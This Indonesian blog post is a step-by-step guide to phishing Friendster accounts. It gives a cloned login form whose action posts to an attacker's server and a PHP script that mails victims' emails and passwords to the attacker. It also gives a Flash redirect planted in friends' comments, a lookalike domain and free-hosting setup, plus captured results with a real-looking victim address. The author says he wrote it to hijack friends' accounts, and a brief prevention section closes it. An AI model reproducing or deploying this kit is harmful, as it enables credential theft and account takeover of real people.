Sedangkan menurut saya Phishing sendiri mempunya arti menyamarkan sesuatu yang asli dengan yang palsu, sehingga yang palsu benar-benar mirip dengan yang asli, dengan tujuan penipuan. Kasus Phishing pernah terjadi di Official Web site BCA Online, hingga sekarang yaitu FS.
Pembahasan ini sudah dijumpai dibanyak blog-blog namun pada umumnya hanya memberikan sedikit sekali gambaran bagaimana proses phishing itu terjadi, apabila tidak hati-hati maka account kita + passwordnya akan diketahui oleh orang lain.
Baiklah sekarang akan saya berikan gambaran mengenai Phishing di FS, dalam proses Phishing di FS ada beberapa hal yang harus diketahui(versi saya), yaitu :
1. Manajemen File URL.
2. Pemahaman Form HTML.
3. mail() command di PHP.
4. Pemahaman Redirection.
5. Kreatifitas difakename URL.
5 hal tersebut merupakan faktor wajib yang harus diketahui sebelum melakukan Phishing, mengapa karena 5 komponen dasar tersebut menentukan berhasil/tidaknya sebuah Phishing, saya jelaskan fungsional 5 komponen tersebut.
1.Manajemen File URL.
Pentingnya manajemen File Url adalah dimana proses pemalsuan sebuah form yang asli ke yg palsu/yg akan kita gunakan, haruslah benar” sama modelnya/bentuknya sehingga orang lain bila tidak sangat teliti akan terkecoh bahwa form yang ada dimonitornya adalah asli, bila menggunakan Mozilla Firefox anda bisa mencuri form Login FS dengan menggunakan perintah : File > Save Page As > Filename isi “index.htm” > dan Save as Type “Web page, complete”. Tujuan dari penyimpanan file login tersebut adalah untuk membuat Login FS vesi Fake-nya, setelah kita simpan, kemudian kita rubah form actionnya seperti penjelasan no 2. Kemudian semua file tadi kita Upload ke Free Hosting kesukaan kita, saya menggunakan http://www.ripway.com -> ( http://h1.ripway.com/friendsterid ). Alamat diatas modelnya sama persis dengan Form login FS sehingga jika kita tidak teliti sangat berbahaya, yang membedakan adalah slide foto tidak berubah jika di refresh, dan juga tanggalnya, dan perhatikan source htmlnya khususnya dibagian <form>.
2. Pemahaman Form HTML.
Form HTML merupakan komponen dasar untuk mengirim informasi calon korban yang perlu dipamahami adalah komponen <form>,<input> komponen <form> mempunyai sub komponen yaitu “method” dan “action”, dimana action sangat menentukan proses Phishing yang akan kita lakukan, dan untuk <input> penting pada komponen “name” di FS input ada 2 sub komponen penting pembawa bencana
index.htm, form yang di edit untuk phishing
<form name="login_form" method="post" action="http://fakename.com/login.php">
Email: <input name="email" maxlength="100" size="22" alt="Email Address"
tabindex="1" style="width: 200px ! important;" value="" type="text">
Password: <input name="password" maxlength="10" size="22" alt="Password"
tabindex="2" style="width: 200px ! important;" type="password">
<td><div class="loginButton"><input value="Log In" tabindex="3" type="submit">
</form>
Yang saya rubah pada bagian “action” saja, diarahkan ke file penyetor password (login.php versi kita)yang nantinya dikirim ke e-mail kita menggunakan aplikasi PHP.
3. Function mail() di PHP.
Saya pilih opsi ini karena mudah menggunakannya, ada opsi lain misal store database, namun tambah ribed nantinya anda harus membuat database untuk memasuk kan email dan password korban, dan jika mencari free hostingan php yang support ke database agak sulit
login.php, store user + password ke e-mail
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap
’;
$message = $isi;
$headers = ‘Rejeki FS
’;
mail($to, $subject, $message, $headers);
?>
Sangat sederhana
4. Pemahaman Redirection.
Redirection merupakan proses pemindahan halaman web secara otomatis/manual menggunakan script, script pertama redirection yang harus anda tahu adalah Redirection dari FS ke Fakefs kita, jadi option ini bisa menggunakan opsi manual dan otomatis, opsi manual bisa menggunakan gambar yang menarik sehingga jika kita klik gambar tersebut akan mengarah ke Fakefs kita, dan jika sudah ter klik dan target mengisikan login dan passwordnya di Fakefs kita, berhasil sudah cara ini, jika menggunakan opsi otomatis, yang saya gunakan adalah script di Flash berupa action script GetURL(”url”,”type”,”method”);, pada aplikasi flash jika kita menggunakan GetURL maka otomatis pada saat load animasi kita yang di dalamnya sudah disusupi GetURL maka halaman FS akan di redirect ke Fakefs kita (contoh : http://www.friendster.com/kuyamudik ). Jika halaman FS disamping kita buka menggunakan IE maka otomatis akan di redirect ke halaman Fakefs, karena di ditesti FS tersebut sudah ada file flash yang meredirect dari FS ke Fakefs, perhatikan address barnya, dan opsi ini berlaku jika menggunakan IE, jika pada Mozilla Firefox tidak berlaku, kecuali menggunakan type _blank.
Action Script yang saya gunakan di Flash:
press-fs.swf, file animasi disusupi action script redirection
getURL("http://friendster-id.cjb.net","_self","get");
Redirection ke 2 berada di file login.php dimana Email login dan password di kirim ke e-mail saya, karena menggunakan koneksi IIX, redirection ini tidak akan terasa, tau-tau anda sudah ada di halaman FS anda sendiri, padahal setelah anda login untuk ke 2 kalinya anda sudah terjebak, berikut script redirection ke 2 yang saya gunakan:
login.php, file pengirim Email login FS + password ke email saya
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.friendster.com">
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap
’;
$message = $isi;
$headers = ‘Rejeki FS
’;
mail($to, $subject, $message, $headers);
?>
5. Kreatifitas Fakename URL.
Bagian ini juga sangat mendukung suksesnya Phishing di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fakefs kita, saya sendiri menggunakan Fakefs domain http://www.friendster-id.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja
Rule Phishing FS, menurut gaya saya
[Target]->[Buka dan Login FS]->[Lihat testi teman yang terinfeksi Redirection]
|– [Jika menggunakan Mozilla Firefox, halaman gagal di redirect]->[Gagal]->[X]
|– [jika menggunakan IE, halaman akan di redirect ke Fakefs]->[Login di Fakefs]
->[Email + Password di rekam & dikirim ke email saya]->[diredirect ke FS semula]
->[Phishing FS sukses].
Sederhana sekali bukan?
Komponen-komponen yang saya pakai:
1. Freehosting di : http://www.ripway.com
(http://h1.ripway.com/friendsterid) Sebagai tempat menyimpan file FS palsu/Fakefs yang sudah saya modif di bagian formnya.
2. Freedomain : http://www.cjb.net (http://www.friendster-id.cjb.net)
Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file yang ada di ripway.com
3. Hosting PHP :
Hostingan yang support dengan function mail() yang digunakan untuk eksekusi pengiriman email dan password si target, disini saya gunakan login.php, atau anda akan menggunakan aplikasi database, silahkan saja, atau write() terserah kreasi anda sekalian
4. File Redirect :
Saya menggunakan Flash, karena option otomatis redirectnya
5. Email :
Alamat email untuk store email dan password target.
Contoh FS di comment/testinya sudah terkena Phishing :
http://www.friendster.com/kuyamudik
Contoh hasil target yang sukses terkirim di email saya:
± From Date Subject
============================================
± Nobody 10:16 am Friendster Trap
± Nobody 7:37 am Friendster Trap
± Nobody Mon, 10:37 pm Friendster Trap
± Nobody Mon, 10:25 pm Friendster Trap
Jika dibuka isinya:
=================================================
Rejeki FS
id: sapoedjagad@hotmail.com | password: s******t
PENCEGAHAN
Ada beberapa Opsi yang harus kita perhatikan untuk FS ini, diantaranya:
- Biasakan membuka FS menggunakan Mozilla Firefox
.
- Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing
. Option -> Approve comments automatically: Pilih “Never”.
- Teliti jika ingin login lihat URL nya, jika bukan dari http://friendster.com maka jangan berani-berani login, close saja, dan buka http://friendster.com.
Artikel ini saya tulis karena iseng saja, ingin ngebajak FS temen hehe
Isi jika E-Mail dibuka
Salam manis,